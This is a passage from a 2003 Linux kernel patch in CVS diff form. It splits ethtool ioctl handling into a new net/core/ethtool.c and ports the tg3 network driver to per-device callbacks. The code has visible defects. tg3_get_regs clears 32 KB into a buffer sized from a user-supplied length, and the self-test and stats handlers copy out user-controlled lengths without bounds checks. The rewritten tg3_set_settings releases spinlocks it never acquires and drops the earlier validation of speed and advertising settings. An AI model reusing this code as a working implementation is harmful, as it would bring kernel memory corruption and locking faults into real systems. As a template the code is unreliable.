HAVE_NETIF_RECEIVE_SKB 1 extern int netif_receive_skb(struct sk_buff *skb); extern int dev_ioctl(unsigned int cmd, void *); +extern int dev_ethtool(struct ifreq *); extern unsigned dev_get_flags(const struct net_device *); extern int dev_change_flags(struct net_device *, unsigned); extern int dev_set_mtu(struct net_device *, int); Index: net/socket.c =================================================================== RCS file: /var/cvs/linux-2.5/net/socket.c,v retrieving revision 1.21 diff -u -p -r1.21 socket.c --- net/socket.c 17 Jun 2003 11:54:29 -0000 1.21 +++ net/socket.c 17 Jun 2003 11:57:20 -0000 @@ -74,7 +74,6 @@ #include #include #include -#include #include #include #include @@ -1916,10 +1915,7 @@ int sock_unregister(int family) extern void sk_init(void); - -#ifdef CONFIG_WAN_ROUTER extern void wanrouter_init(void); -#endif void __init sock_init(void) { Index: net/core/Makefile =================================================================== RCS file: /var/cvs/linux-2.5/net/core/Makefile,v retrieving revision 1.9 diff -u -p -r1.9 Makefile --- net/core/Makefile 27 May 2003 17:29:33 -0000 1.9 +++ net/core/Makefile 4 Jun 2003 18:39:01 -0000 @@ -10,8 +10,8 @@ obj-y += sysctl_net_core.o endif endif -obj-$(CONFIG_NET) += flow.o dev.o net-sysfs.o dev_mcast.o dst.o neighbour.o \ - rtnetlink.o utils.o link_watch.o filter.o +obj-$(CONFIG_NET) += flow.o dev.o ethtool.o net-sysfs.o dev_mcast.o dst.o \ + neighbour.o rtnetlink.o utils.o link_watch.o filter.o obj-$(CONFIG_NETFILTER) += netfilter.o obj-$(CONFIG_NET_DIVERT) += dv.o Index: net/core/dev.c =================================================================== RCS file: /var/cvs/linux-2.5/net/core/dev.c,v retrieving revision 1.22 diff -u -p -r1.22 dev.c --- net/core/dev.c 2 Jul 2003 22:08:58 -0000 1.22 +++ net/core/dev.c 8 Jul 2003 15:36:35 -0000 @@ -2224,6 +2224,36 @@ int dev_set_mtu(struct net_device *dev, return err; } +/* These are all netdev_op methods in case a driver needs to do something + * different. 
If we find that all drivers want to do the same thing here, + * we can turn them into dev_() function calls. + */ + +u32 netdev_op_get_link(struct net_device *dev) +{ + return netif_carrier_ok(dev) ? 1 : 0; +} + +u32 netdev_op_get_tx_csum(struct net_device *dev) +{ + return (dev->features & NETIF_F_IP_CSUM) != 0; +} + +u32 netdev_op_get_sg(struct net_device *dev) +{ + return (dev->features & NETIF_F_SG) != 0; +} + +int netdev_op_set_sg(struct net_device *dev, u32 data) +{ + if (data) + dev->features |= NETIF_F_SG; + else + dev->features &= ~NETIF_F_SG; + + return 0; +} + /* * Perform the SIOCxIFxxx calls. @@ -2364,7 +2394,6 @@ static int dev_ifsioc(struct ifreq *ifr, cmd == SIOCBONDSLAVEINFOQUERY || cmd == SIOCBONDINFOQUERY || cmd == SIOCBONDCHANGEACTIVE || - cmd == SIOCETHTOOL || cmd == SIOCGMIIPHY || cmd == SIOCGMIIREG || cmd == SIOCSMIIREG || @@ -2461,13 +2490,26 @@ int dev_ioctl(unsigned int cmd, void *ar } return ret; + case SIOCETHTOOL: + dev_load(ifr.ifr_name); + rtnl_lock(); + ret = dev_ethtool(&ifr); + rtnl_unlock(); + if (!ret) { + if (colon) + *colon = ':'; + if (copy_to_user(arg, &ifr, + sizeof(struct ifreq))) + ret = -EFAULT; + } + return ret; + /* * These ioctl calls: * - require superuser power. * - require strict serialization. * - return a value */ - case SIOCETHTOOL: case SIOCGMIIPHY: case SIOCGMIIREG: if (!capable(CAP_NET_ADMIN)) Index: net/core/ethtool.c =================================================================== RCS file: net/core/ethtool.c diff -N net/core/ethtool.c --- /dev/null 1 Jan 1970 00:00:00 -0000 +++ net/core/ethtool.c 8 Jul 2003 15:29:25 -0000 @@ -0,0 +1,546 @@ +/* + * net/core/ethtool.c - Ethtool ioctl handler + * Split from net/core/dev.c by Matthew Wilcox + * The only entry point in this file is dev_ethtool() and its only caller + * is from net/core/dev.c + * + * It's GPL, stupid. 
+ */ + +#include +#include +#include + +static int ethtool_get_settings(struct net_device *dev, void *useraddr) +{ + struct ethtool_cmd cmd = { ETHTOOL_GSET }; + int err; + + if (!dev->netdev_ops->get_settings) + return -EOPNOTSUPP; + + err = dev->netdev_ops->get_settings(dev, &cmd); + if (err < 0) + return err; + + if (copy_to_user(useraddr, &cmd, sizeof(cmd))) + return -EFAULT; + return 0; +} + +static int ethtool_set_settings(struct net_device *dev, void *useraddr) +{ + struct ethtool_cmd cmd; + + if (!dev->netdev_ops->set_settings) + return -EOPNOTSUPP; + + if (copy_from_user(&cmd, useraddr, sizeof(cmd))) + return -EFAULT; + + return dev->netdev_ops->set_settings(dev, &cmd); +} + +static int ethtool_get_drvinfo(struct net_device *dev, void *useraddr) +{ + struct ethtool_drvinfo info = { ETHTOOL_GDRVINFO }; + + if (!dev->netdev_ops->get_drvinfo) + return -EOPNOTSUPP; + + dev->netdev_ops->get_drvinfo(dev, &info); + + if (copy_to_user(useraddr, &info, sizeof(info))) + return -EFAULT; + return 0; +} + +static int ethtool_get_regs(struct net_device *dev, char *useraddr) +{ + struct ethtool_regs regs; + struct netdev_ops *ops = dev->netdev_ops; + void *regbuf; + int ret; + + if (!ops->get_regs || !ops->get_regs_len) + return -EOPNOTSUPP; + + if (copy_from_user(&regs, useraddr, sizeof(regs))) + return -EFAULT; + + regbuf = kmalloc(ops->get_regs_len(&regs), GFP_KERNEL); + if (!regbuf) + return -ENOMEM; + + ops->get_regs(dev, &regs, regbuf); + + ret = 0; + if (copy_to_user(useraddr, &regs, sizeof(regs))) + ret = -EFAULT; + useraddr += offsetof(struct ethtool_regs, data); + if (copy_to_user(useraddr, regbuf, regs.len)) + ret = -EFAULT; + + kfree(regbuf); + return ret; +} + +static int ethtool_get_wol(struct net_device *dev, char *useraddr) +{ + struct ethtool_wolinfo wol = { ETHTOOL_GWOL }; + + if (!dev->netdev_ops->get_wol) + return -EOPNOTSUPP; + + dev->netdev_ops->get_wol(dev, &wol); + + if (copy_to_user(useraddr, &wol, sizeof(wol))) + return -EFAULT; + return 0; +} + +static int
ethtool_set_wol(struct net_device *dev, char *useraddr) +{ + struct ethtool_wolinfo wol; + + if (!dev->netdev_ops->set_wol) + return -EOPNOTSUPP; + + if (copy_from_user(&wol, useraddr, sizeof(wol))) + return -EFAULT; + + return dev->netdev_ops->set_wol(dev, &wol); +} + +static int ethtool_get_msglevel(struct net_device *dev, char *useraddr) +{ + struct ethtool_value edata = { ETHTOOL_GMSGLVL }; + + if (!dev->netdev_ops->get_msglevel) + return -EOPNOTSUPP; + + edata.data = dev->netdev_ops->get_msglevel(dev); + + if (copy_to_user(useraddr, &edata, sizeof(edata))) + return -EFAULT; + return 0; +} + +static int ethtool_set_msglevel(struct net_device *dev, char *useraddr) +{ + struct ethtool_value edata; + + if (!dev->netdev_ops->set_msglevel) + return -EOPNOTSUPP; + + if (copy_from_user(&edata, useraddr, sizeof(edata))) + return -EFAULT; + + dev->netdev_ops->set_msglevel(dev, edata.data); + return 0; +} + +static int ethtool_nway_reset(struct net_device *dev) +{ + if (!dev->netdev_ops->nway_reset) + return -EOPNOTSUPP; + + return dev->netdev_ops->nway_reset(dev); +} + +static int ethtool_get_link(struct net_device *dev, void *useraddr) +{ + struct ethtool_value edata = { ETHTOOL_GLINK }; + + if (!dev->netdev_ops->get_link) + return -EOPNOTSUPP; + + edata.data = dev->netdev_ops->get_link(dev); + + if (copy_to_user(useraddr, &edata, sizeof(edata))) + return -EFAULT; + return 0; +} + +static int ethtool_get_eeprom(struct net_device *dev, void *useraddr) +{ + struct ethtool_eeprom eeprom = { ETHTOOL_GEEPROM }; + + if (!dev->netdev_ops->get_eeprom) + return -EOPNOTSUPP; + + dev->netdev_ops->get_eeprom(dev, &eeprom); + + if (copy_to_user(useraddr, &eeprom, sizeof(eeprom))) + return -EFAULT; + return 0; +} + +static int ethtool_set_eeprom(struct net_device *dev, void *useraddr) +{ + struct ethtool_eeprom eeprom; + + if (!dev->netdev_ops->set_eeprom) + return -EOPNOTSUPP; + + if (copy_from_user(&eeprom, useraddr, sizeof(eeprom))) + return -EFAULT; + + return
dev->netdev_ops->set_eeprom(dev, &eeprom); +} + +static int ethtool_get_coalesce(struct net_device *dev, void *useraddr) +{ + struct ethtool_coalesce coalesce = { ETHTOOL_GCOALESCE }; + + if (!dev->netdev_ops->get_coalesce) + return -EOPNOTSUPP; + + dev->netdev_ops->get_coalesce(dev, &coalesce); + + if (copy_to_user(useraddr, &coalesce, sizeof(coalesce))) + return -EFAULT; + return 0; +} + +static int ethtool_set_coalesce(struct net_device *dev, void *useraddr) +{ + struct ethtool_coalesce coalesce; + + if (!dev->netdev_ops->set_coalesce) + return -EOPNOTSUPP; + + if (copy_from_user(&coalesce, useraddr, sizeof(coalesce))) + return -EFAULT; + + return dev->netdev_ops->set_coalesce(dev, &coalesce); +} + +static int ethtool_get_ringparam(struct net_device *dev, void *useraddr) +{ + struct ethtool_ringparam ringparam = { ETHTOOL_GRINGPARAM }; + + if (!dev->netdev_ops->get_ringparam) + return -EOPNOTSUPP; + + dev->netdev_ops->get_ringparam(dev, &ringparam); + + if (copy_to_user(useraddr, &ringparam, sizeof(ringparam))) + return -EFAULT; + return 0; +} + +static int ethtool_set_ringparam(struct net_device *dev, void *useraddr) +{ + struct ethtool_ringparam ringparam; + + if (!dev->netdev_ops->set_ringparam) + return -EOPNOTSUPP; + + if (copy_from_user(&ringparam, useraddr, sizeof(ringparam))) + return -EFAULT; + + return dev->netdev_ops->set_ringparam(dev, &ringparam); +} + +static int ethtool_get_pauseparam(struct net_device *dev, void *useraddr) +{ + struct ethtool_pauseparam pauseparam = { ETHTOOL_GPAUSEPARAM }; + + if (!dev->netdev_ops->get_pauseparam) + return -EOPNOTSUPP; + + dev->netdev_ops->get_pauseparam(dev, &pauseparam); + + if (copy_to_user(useraddr, &pauseparam, sizeof(pauseparam))) + return -EFAULT; + return 0; +} + +static int ethtool_set_pauseparam(struct net_device *dev, void *useraddr) +{ + struct ethtool_pauseparam pauseparam; + + if (!dev->netdev_ops->set_pauseparam) + return -EOPNOTSUPP; + + if (copy_from_user(&pauseparam, useraddr,
sizeof(pauseparam))) + return -EFAULT; + + return dev->netdev_ops->set_pauseparam(dev, &pauseparam); +} + +static int ethtool_get_rx_csum(struct net_device *dev, char *useraddr) +{ + struct ethtool_value edata = { ETHTOOL_GRXCSUM }; + + if (!dev->netdev_ops->get_rx_csum) + return -EOPNOTSUPP; + + edata.data = dev->netdev_ops->get_rx_csum(dev); + + if (copy_to_user(useraddr, &edata, sizeof(edata))) + return -EFAULT; + return 0; +} + +static int ethtool_set_rx_csum(struct net_device *dev, char *useraddr) +{ + struct ethtool_value edata; + + if (!dev->netdev_ops->set_rx_csum) + return -EOPNOTSUPP; + + if (copy_from_user(&edata, useraddr, sizeof(edata))) + return -EFAULT; + + dev->netdev_ops->set_rx_csum(dev, edata.data); + return 0; +} + +static int ethtool_get_tx_csum(struct net_device *dev, char *useraddr) +{ + struct ethtool_value edata = { ETHTOOL_GTXCSUM }; + + if (!dev->netdev_ops->get_tx_csum) + return -EOPNOTSUPP; + + edata.data = dev->netdev_ops->get_tx_csum(dev); + + if (copy_to_user(useraddr, &edata, sizeof(edata))) + return -EFAULT; + return 0; +} + +static int ethtool_set_tx_csum(struct net_device *dev, char *useraddr) +{ + struct ethtool_value edata; + + if (!dev->netdev_ops->set_tx_csum) + return -EOPNOTSUPP; + + if (copy_from_user(&edata, useraddr, sizeof(edata))) + return -EFAULT; + + return dev->netdev_ops->set_tx_csum(dev, edata.data); +} + +static int ethtool_get_sg(struct net_device *dev, char *useraddr) +{ + struct ethtool_value edata = { ETHTOOL_GSG }; + + if (!dev->netdev_ops->get_sg) + return -EOPNOTSUPP; + + edata.data = dev->netdev_ops->get_sg(dev); + + if (copy_to_user(useraddr, &edata, sizeof(edata))) + return -EFAULT; + return 0; +} + +static int ethtool_set_sg(struct net_device *dev, char *useraddr) +{ + struct ethtool_value edata; + + if (!dev->netdev_ops->set_sg) + return -EOPNOTSUPP; + + if (copy_from_user(&edata, useraddr, sizeof(edata))) + return -EFAULT; + + return dev->netdev_ops->set_sg(dev, edata.data); +} + +static int 
ethtool_self_test(struct net_device *dev, char *useraddr) +{ + struct ethtool_test test; + struct netdev_ops *ops = dev->netdev_ops; + u64 *data; + int ret; + + if (!ops->self_test || !ops->self_test_len) + return -EOPNOTSUPP; + + if (copy_from_user(&test, useraddr, sizeof(test))) + return -EFAULT; + + data = kmalloc(ops->self_test_len(&test), GFP_KERNEL); + if (!data) + return -ENOMEM; + + ops->self_test(dev, &test, data); + + ret = 0; + if (copy_to_user(useraddr, &test, sizeof(test))) + ret = -EFAULT; + useraddr += sizeof(test); + if (copy_to_user(useraddr, data, sizeof(u64) * test.len)) + ret = -EFAULT; + + kfree(data); + return ret; +} + +static int ethtool_get_strings(struct net_device *dev, void *useraddr) +{ + struct ethtool_gstrings gstrings; + struct netdev_ops *ops = dev->netdev_ops; + u8 *data; + int ret; + + if (!ops->get_strings || !ops->get_strings_len) + return -EOPNOTSUPP; + + if (copy_from_user(&gstrings, useraddr, sizeof(gstrings))) + return -EFAULT; + + data = kmalloc(ops->get_strings_len(&gstrings), GFP_KERNEL); + if (!data) + return -ENOMEM; + + ops->get_strings(dev, &gstrings, data); + + ret= 0; + if (copy_to_user(useraddr, &gstrings, sizeof(gstrings))) + ret = -EFAULT; + useraddr += sizeof(gstrings); + if (copy_to_user(useraddr, data, gstrings.len * ETH_GSTRING_LEN)) + ret = -EFAULT; + + kfree(data); + return ret; +} + +static int ethtool_phys_id(struct net_device *dev, void *useraddr) +{ + struct ethtool_value id; + + if (!dev->netdev_ops->phys_id) + return -EOPNOTSUPP; + + if (copy_from_user(&id, useraddr, sizeof(id))) + return -EFAULT; + + dev->netdev_ops->phys_id(dev, id.data); + return 0; +} + +static int ethtool_get_stats(struct net_device *dev, void *useraddr) +{ + struct ethtool_stats stats; + struct netdev_ops *ops = dev->netdev_ops; + u64 *data; + int ret; + + if (!ops->get_stats || !ops->get_stats_len) + return -EOPNOTSUPP; + + if (copy_from_user(&stats, useraddr, sizeof(stats))) + return -EFAULT; + + data = 
kmalloc(ops->get_stats_len(&stats), GFP_KERNEL); + if (!data) + return -ENOMEM; + + ops->get_stats(dev, &stats, data); + + ret = 0; + if (copy_to_user(useraddr, &stats, sizeof(stats))) + ret = -EFAULT; + useraddr += sizeof(stats); + if (copy_to_user(useraddr, data, stats.n_stats * sizeof(u64))) + ret = -EFAULT; + + kfree(data); + return ret; +} + +int dev_ethtool(struct ifreq *ifr) +{ + struct net_device *dev = __dev_get_by_name(ifr->ifr_name); + void *useraddr = (void *) ifr->ifr_data; + u32 ethcmd; + + /* XXX: We can make this more finegrained now. Keep existing + * behaviour for the moment. + */ + if (!capable(CAP_NET_ADMIN)) + return -EPERM; + + if (!dev || !netif_device_present(dev)) + return -ENODEV; + + if (!dev->netdev_ops) + goto ioctl; + + if (copy_from_user (&ethcmd, useraddr, sizeof (ethcmd))) + return -EFAULT; + + switch (ethcmd) { + case ETHTOOL_GSET: + return ethtool_get_settings(dev, useraddr); + case ETHTOOL_SSET: + return ethtool_set_settings(dev, useraddr); + case ETHTOOL_GDRVINFO: + return ethtool_get_drvinfo(dev, useraddr); + case ETHTOOL_GREGS: + return ethtool_get_regs(dev, useraddr); + case ETHTOOL_GWOL: + return ethtool_get_wol(dev, useraddr); + case ETHTOOL_SWOL: + return ethtool_set_wol(dev, useraddr); + case ETHTOOL_GMSGLVL: + return ethtool_get_msglevel(dev, useraddr); + case ETHTOOL_SMSGLVL: + return ethtool_set_msglevel(dev, useraddr); + case ETHTOOL_NWAY_RST: + return ethtool_nway_reset(dev); + case ETHTOOL_GLINK: + return ethtool_get_link(dev, useraddr); + case ETHTOOL_GEEPROM: + return ethtool_get_eeprom(dev, useraddr); + case ETHTOOL_SEEPROM: + return ethtool_set_eeprom(dev, useraddr); + case ETHTOOL_GCOALESCE: + return ethtool_get_coalesce(dev, useraddr); + case ETHTOOL_SCOALESCE: + return ethtool_set_coalesce(dev, useraddr); + case ETHTOOL_GRINGPARAM: + return ethtool_get_ringparam(dev, useraddr); + case ETHTOOL_SRINGPARAM: + return ethtool_set_ringparam(dev, useraddr); + case ETHTOOL_GPAUSEPARAM: + return
ethtool_get_pauseparam(dev, useraddr); + case ETHTOOL_SPAUSEPARAM: + return ethtool_set_pauseparam(dev, useraddr); + case ETHTOOL_GRXCSUM: + return ethtool_get_rx_csum(dev, useraddr); + case ETHTOOL_SRXCSUM: + return ethtool_set_rx_csum(dev, useraddr); + case ETHTOOL_GTXCSUM: + return ethtool_get_tx_csum(dev, useraddr); + case ETHTOOL_STXCSUM: + return ethtool_set_tx_csum(dev, useraddr); + case ETHTOOL_GSG: + return ethtool_get_sg(dev, useraddr); + case ETHTOOL_SSG: + return ethtool_set_sg(dev, useraddr); + case ETHTOOL_TEST: + return ethtool_self_test(dev, useraddr); + case ETHTOOL_GSTRINGS: + return ethtool_get_strings(dev, useraddr); + case ETHTOOL_PHYS_ID: + return ethtool_phys_id(dev, useraddr); + case ETHTOOL_GSTATS: + return ethtool_get_stats(dev, useraddr); + default: + return -EOPNOTSUPP; + } + + ioctl: + if (dev->do_ioctl) + return dev->do_ioctl(dev, ifr, SIOCETHTOOL); + return -EOPNOTSUPP; +} + Index: drivers/net/tg3.c =================================================================== RCS file: /var/cvs/linux-2.5/drivers/net/tg3.c,v retrieving revision 1.16 diff -u -p -r1.16 tg3.c --- drivers/net/tg3.c 14 Jun 2003 22:15:21 -0000 1.16 +++ drivers/net/tg3.c 8 Jul 2003 14:03:04 -0000 @@ -5036,16 +5036,24 @@ static void tg3_set_rx_mode(struct net_d #define TG3_REGDUMP_LEN (32 * 1024) -static u8 *tg3_get_regs(struct tg3 *tp) +static int tg3_get_regs_len(struct ethtool_regs *regs) { - u8 *orig_p = kmalloc(TG3_REGDUMP_LEN, GFP_KERNEL); - u8 *p; + if (regs->len > TG3_REGDUMP_LEN) + regs->len = TG3_REGDUMP_LEN; + return regs->len; +} + +static void tg3_get_regs(struct net_device *dev, struct ethtool_regs *regs, void *p) +{ + struct tg3 *tp = dev->priv; + u8 *orig_p = p; int i; - if (orig_p == NULL) - return NULL; + if (regs->len > TG3_REGDUMP_LEN) + regs->len = TG3_REGDUMP_LEN; + regs->version = 0; - memset(orig_p, 0, TG3_REGDUMP_LEN); + memset(p, 0, TG3_REGDUMP_LEN); spin_lock_irq(&tp->lock); spin_lock(&tp->tx_lock); @@ -5099,390 +5107,291 @@ do { p = orig_p + 
(reg); \ spin_unlock(&tp->tx_lock); spin_unlock_irq(&tp->lock); - - return orig_p; } -static int tg3_ethtool_ioctl (struct net_device *dev, void *useraddr) +static int tg3_get_settings(struct net_device *dev, struct ethtool_cmd *cmd) { struct tg3 *tp = dev->priv; - struct pci_dev *pci_dev = tp->pdev; - u32 ethcmd; - - if (copy_from_user (&ethcmd, useraddr, sizeof (ethcmd))) - return -EFAULT; - switch (ethcmd) { - case ETHTOOL_GDRVINFO:{ - struct ethtool_drvinfo info = { ETHTOOL_GDRVINFO }; - strcpy (info.driver, DRV_MODULE_NAME); - strcpy (info.version, DRV_MODULE_VERSION); - memset(&info.fw_version, 0, sizeof(info.fw_version)); - strcpy (info.bus_info, pci_dev->slot_name); - info.eedump_len = 0; - info.regdump_len = TG3_REGDUMP_LEN; - if (copy_to_user (useraddr, &info, sizeof (info))) - return -EFAULT; - return 0; - } + if (!(tp->tg3_flags & TG3_FLAG_INIT_COMPLETE) || + tp->link_config.phy_is_low_power) + return -EAGAIN; + + cmd->supported = (SUPPORTED_Autoneg); + + if (!(tp->tg3_flags & TG3_FLAG_10_100_ONLY)) + cmd->supported |= (SUPPORTED_1000baseT_Half | + SUPPORTED_1000baseT_Full); + + if (tp->phy_id != PHY_ID_SERDES) + cmd->supported |= (SUPPORTED_100baseT_Half | + SUPPORTED_100baseT_Full | + SUPPORTED_10baseT_Half | + SUPPORTED_10baseT_Full | + SUPPORTED_MII); + else + cmd->supported |= SUPPORTED_FIBRE; - case ETHTOOL_GSET: { - struct ethtool_cmd cmd = { ETHTOOL_GSET }; + cmd->advertising = tp->link_config.advertising; + cmd->speed = tp->link_config.active_speed; + cmd->duplex = tp->link_config.active_duplex; + cmd->port = 0; + cmd->phy_address = PHY_ADDR; + cmd->transceiver = 0; + cmd->autoneg = tp->link_config.autoneg; + cmd->maxtxpkt = 0; + cmd->maxrxpkt = 0; + return 0; +} - if (!(tp->tg3_flags & TG3_FLAG_INIT_COMPLETE) || - tp->link_config.phy_is_low_power) - return -EAGAIN; - cmd.supported = (SUPPORTED_Autoneg); - - if (!(tp->tg3_flags & TG3_FLAG_10_100_ONLY)) - cmd.supported |= (SUPPORTED_1000baseT_Half | - SUPPORTED_1000baseT_Full); - - if (tp->phy_id
!= PHY_ID_SERDES) - cmd.supported |= (SUPPORTED_100baseT_Half | - SUPPORTED_100baseT_Full | - SUPPORTED_10baseT_Half | - SUPPORTED_10baseT_Full | - SUPPORTED_MII); - else - cmd.supported |= SUPPORTED_FIBRE; +static int tg3_set_settings(struct net_device *dev, struct ethtool_cmd *cmd) +{ + struct tg3 *tp = dev->priv; - cmd.advertising = tp->link_config.advertising; - cmd.speed = tp->link_config.active_speed; - cmd.duplex = tp->link_config.active_duplex; - cmd.port = 0; - cmd.phy_address = PHY_ADDR; - cmd.transceiver = 0; - cmd.autoneg = tp->link_config.autoneg; - cmd.maxtxpkt = 0; - cmd.maxrxpkt = 0; - if (copy_to_user(useraddr, &cmd, sizeof(cmd))) - return -EFAULT; - return 0; + if (!(tp->tg3_flags & TG3_FLAG_INIT_COMPLETE) || + tp->link_config.phy_is_low_power) + return -EAGAIN; + + if (cmd->autoneg == AUTONEG_ENABLE) { + tp->link_config.advertising = cmd->advertising; + tp->link_config.speed = SPEED_INVALID; + tp->link_config.duplex = DUPLEX_INVALID; + } else { + tp->link_config.speed = cmd->speed; + tp->link_config.duplex = cmd->duplex; } - case ETHTOOL_SSET: { - struct ethtool_cmd cmd; - - if (!(tp->tg3_flags & TG3_FLAG_INIT_COMPLETE) || - tp->link_config.phy_is_low_power) - return -EAGAIN; - - if (copy_from_user(&cmd, useraddr, sizeof(cmd))) - return -EFAULT; - - /* Fiber PHY only supports 1000 full/half */ - if (cmd.autoneg == AUTONEG_ENABLE) { - if (tp->phy_id == PHY_ID_SERDES && - (cmd.advertising & - (ADVERTISED_10baseT_Half | - ADVERTISED_10baseT_Full | - ADVERTISED_100baseT_Half | - ADVERTISED_100baseT_Full))) - return -EINVAL; - if ((tp->tg3_flags & TG3_FLAG_10_100_ONLY) && - (cmd.advertising & - (ADVERTISED_1000baseT_Half | - ADVERTISED_1000baseT_Full))) - return -EINVAL; - } else { - if (tp->phy_id == PHY_ID_SERDES && - (cmd.speed == SPEED_10 || - cmd.speed == SPEED_100)) - return -EINVAL; - if ((tp->tg3_flags & TG3_FLAG_10_100_ONLY) && - (cmd.speed == SPEED_10 || - cmd.speed == SPEED_100)) - return -EINVAL; - } - spin_lock_irq(&tp->lock); - 
spin_lock(&tp->tx_lock); - - tp->link_config.autoneg = cmd.autoneg; - if (cmd.autoneg == AUTONEG_ENABLE) { - tp->link_config.advertising = cmd.advertising; - tp->link_config.speed = SPEED_INVALID; - tp->link_config.duplex = DUPLEX_INVALID; - } else { - tp->link_config.speed = cmd.speed; - tp->link_config.duplex = cmd.duplex; - } + tg3_setup_phy(tp); + spin_unlock(&tp->tx_lock); + spin_unlock_irq(&tp->lock); - tg3_setup_phy(tp); - spin_unlock(&tp->tx_lock); - spin_unlock_irq(&tp->lock); + return 0; +} - return 0; - } +static void tg3_get_drvinfo(struct net_device *dev, struct ethtool_drvinfo *info) +{ + struct tg3 *tp = dev->priv; + struct pci_dev *pci_dev = tp->pdev; - case ETHTOOL_GREGS: { - struct ethtool_regs regs; - u8 *regbuf; - int ret; - - if (copy_from_user(&regs, useraddr, sizeof(regs))) - return -EFAULT; - if (regs.len > TG3_REGDUMP_LEN) - regs.len = TG3_REGDUMP_LEN; - regs.version = 0; - if (copy_to_user(useraddr, &regs, sizeof(regs))) - return -EFAULT; - - regbuf = tg3_get_regs(tp); - if (!regbuf) - return -ENOMEM; - - useraddr += offsetof(struct ethtool_regs, data); - ret = 0; - if (copy_to_user(useraddr, regbuf, regs.len)) - ret = -EFAULT; - kfree(regbuf); - return ret; - } - case ETHTOOL_GWOL: { - struct ethtool_wolinfo wol = { ETHTOOL_GWOL }; - - wol.supported = WAKE_MAGIC; - wol.wolopts = 0; - if (tp->tg3_flags & TG3_FLAG_WOL_ENABLE) - wol.wolopts = WAKE_MAGIC; - memset(&wol.sopass, 0, sizeof(wol.sopass)); - if (copy_to_user(useraddr, &wol, sizeof(wol))) - return -EFAULT; - return 0; - } - case ETHTOOL_SWOL: { - struct ethtool_wolinfo wol; + strcpy(info->driver, DRV_MODULE_NAME); + strcpy(info->version, DRV_MODULE_VERSION); + memset(&info->fw_version, 0, sizeof(info->fw_version)); + strcpy(info->bus_info, pci_dev->slot_name); + info->eedump_len = 0; + info->regdump_len = TG3_REGDUMP_LEN; +} - if (copy_from_user(&wol, useraddr, sizeof(wol))) - return -EFAULT; - if (wol.wolopts & ~WAKE_MAGIC) - return -EINVAL; - if ((wol.wolopts & WAKE_MAGIC) && -
tp->phy_id == PHY_ID_SERDES && - !(tp->tg3_flags & TG3_FLAG_SERDES_WOL_CAP)) - return -EINVAL; +static void tg3_get_wol(struct net_device *dev, struct ethtool_wolinfo *wol) +{ + struct tg3 *tp = dev->priv; - spin_lock_irq(&tp->lock); - if (wol.wolopts & WAKE_MAGIC) - tp->tg3_flags |= TG3_FLAG_WOL_ENABLE; - else - tp->tg3_flags &= ~TG3_FLAG_WOL_ENABLE; - spin_unlock_irq(&tp->lock); + wol->supported = WAKE_MAGIC; + wol->wolopts = 0; + if (tp->tg3_flags & TG3_FLAG_WOL_ENABLE) + wol->wolopts = WAKE_MAGIC; + memset(&wol->sopass, 0, sizeof(wol->sopass)); +} - return 0; - } - case ETHTOOL_GMSGLVL: { - struct ethtool_value edata = { ETHTOOL_GMSGLVL }; - edata.data = tp->msg_enable; - if (copy_to_user(useraddr, &edata, sizeof(edata))) - return -EFAULT; - return 0; - } - case ETHTOOL_SMSGLVL: { - struct ethtool_value edata; - if (copy_from_user(&edata, useraddr, sizeof(edata))) - return -EFAULT; - tp->msg_enable = edata.data; - return 0; - } - case ETHTOOL_NWAY_RST: { - u32 bmcr; - int r; +static int tg3_set_wol(struct net_device *dev, struct ethtool_wolinfo *wol) +{ + struct tg3 *tp = dev->priv; - spin_lock_irq(&tp->lock); - tg3_readphy(tp, MII_BMCR, &bmcr); - tg3_readphy(tp, MII_BMCR, &bmcr); - r = -EINVAL; - if (bmcr & BMCR_ANENABLE) { - tg3_writephy(tp, MII_BMCR, - bmcr | BMCR_ANRESTART); - r = 0; - } - spin_unlock_irq(&tp->lock); + if (wol->wolopts & ~WAKE_MAGIC) + return -EINVAL; + if ((wol->wolopts & WAKE_MAGIC) && + tp->phy_id == PHY_ID_SERDES && + !(tp->tg3_flags & TG3_FLAG_SERDES_WOL_CAP)) + return -EINVAL; - return r; - } - case ETHTOOL_GLINK: { - struct ethtool_value edata = { ETHTOOL_GLINK }; - edata.data = netif_carrier_ok(tp->dev) ? 
1 : 0; - if (copy_to_user(useraddr, &edata, sizeof(edata))) - return -EFAULT; - return 0; - } - case ETHTOOL_GRINGPARAM: { - struct ethtool_ringparam ering = { ETHTOOL_GRINGPARAM }; + spin_lock_irq(&tp->lock); + if (wol->wolopts & WAKE_MAGIC) + tp->tg3_flags |= TG3_FLAG_WOL_ENABLE; + else + tp->tg3_flags &= ~TG3_FLAG_WOL_ENABLE; + spin_unlock_irq(&tp->lock); - ering.rx_max_pending = TG3_RX_RING_SIZE - 1; - ering.rx_mini_max_pending = 0; - ering.rx_jumbo_max_pending = TG3_RX_JUMBO_RING_SIZE - 1; - - ering.rx_pending = tp->rx_pending; - ering.rx_mini_pending = 0; - ering.rx_jumbo_pending = tp->rx_jumbo_pending; - ering.tx_pending = tp->tx_pending; + return 0; +} - if (copy_to_user(useraddr, &ering, sizeof(ering))) - return -EFAULT; - return 0; - } - case ETHTOOL_SRINGPARAM: { - struct ethtool_ringparam ering; +static u32 tg3_get_msglevel(struct net_device *dev) +{ + struct tg3 *tp = dev->priv; + return tp->msg_enable; +} - if (copy_from_user(&ering, useraddr, sizeof(ering))) - return -EFAULT; +static void tg3_set_msglevel(struct net_device *dev, u32 value) +{ + struct tg3 *tp = dev->priv; + tp->msg_enable = value; +} - if ((ering.rx_pending > TG3_RX_RING_SIZE - 1) || - (ering.rx_jumbo_pending > TG3_RX_JUMBO_RING_SIZE - 1) || - (ering.tx_pending > TG3_TX_RING_SIZE - 1)) - return -EINVAL; +static int tg3_nway_reset(struct net_device *dev) +{ + struct tg3 *tp = dev->priv; + u32 bmcr; + int r; - tg3_netif_stop(tp); - spin_lock_irq(&tp->lock); - spin_lock(&tp->tx_lock); + spin_lock_irq(&tp->lock); + tg3_readphy(tp, MII_BMCR, &bmcr); + tg3_readphy(tp, MII_BMCR, &bmcr); + r = -EINVAL; + if (bmcr & BMCR_ANENABLE) { + tg3_writephy(tp, MII_BMCR, bmcr | BMCR_ANRESTART); + r = 0; + } + spin_unlock_irq(&tp->lock); - tp->rx_pending = ering.rx_pending; - tp->rx_jumbo_pending = ering.rx_jumbo_pending; - tp->tx_pending = ering.tx_pending; - - tg3_halt(tp); - tg3_init_rings(tp); - tg3_init_hw(tp); - netif_wake_queue(tp->dev); - spin_unlock(&tp->tx_lock); - spin_unlock_irq(&tp->lock); 
